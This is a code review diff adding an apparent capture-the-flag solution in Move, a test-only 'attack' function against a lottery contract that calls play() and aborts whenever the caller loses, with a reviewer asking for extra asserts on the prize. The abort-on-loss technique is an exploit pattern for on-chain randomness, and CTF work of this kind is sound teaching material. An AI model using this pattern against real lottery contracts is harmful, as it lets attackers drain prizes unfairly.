solutions/lottery_solution/sources/attack.move

```diff
@@ -0,0 +1,37 @@
+module ctf::attack{
+
+    #[test_only]
+    use std::signer::address_of;
+    #[test_only]
+    use aptos_framework::randomness;
+    #[test_only]
+    use ctf::lottery::{play, has_won};
+
+    const LOSE :u64 =1;
+
+    #[lint::allow_unsafe_randomness]
+    #[test(aptos_framework=@aptos_framework,caller=@ctf)]
+    public fun attack(aptos_framework:&signer,caller:&signer){
+        randomness::initialize(aptos_framework);
+        play(caller);
+        let win = has_won(address_of(caller));
+        if(!win){
+            abort LOSE
+        }
```

Comment:
since this is a test can we add 2 more asserts to check for @ctf being the winner & @ctf prize amount being 1000 - use the get_prize function for this